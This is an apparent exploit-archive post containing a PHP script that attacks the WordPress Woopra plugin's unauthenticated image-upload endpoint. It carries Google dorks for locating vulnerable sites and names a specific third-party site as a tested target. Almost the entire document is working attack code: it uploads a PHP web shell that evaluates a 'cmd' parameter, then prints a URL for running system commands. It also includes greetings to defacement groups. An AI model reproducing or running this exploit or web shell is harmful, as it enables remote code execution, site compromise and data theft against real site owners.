# Exploit Title: woopra plugins execute arbitrary PHP code Exploit # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/ # Date: [06-10-2013] # Exploit Author: wantexz # Vendor Homepage:wordpress.org/plugins/woopra/ # Software Link: wordpress.org/plugins/woopra # Version: woopra # Tested on: [wantexz] # CVE : # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php ############################################################################################ # INDONESIANCODER # by # WANTEXZ # ############################################################################################ <?php # woopra plugins ~ Exploit # http://indonesiancoder.com/ # echo <<<EOT # ----------------------------------- #/ woopra ~ Exploit \ #\ Author: wantexz / # ----------------------------------- ################################################################################################ # Author: WANTEXZ # # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys # all indonesian coder, indonesian defacer, kill-9 ,jatimcom , malangcyber # ################################################################################################ EOT; $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n -u http://target.com/ The full path to Joomla! -f shell.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}"; $url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}"; $data = "<?php eval(\$_GET['cmd']); ?>"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>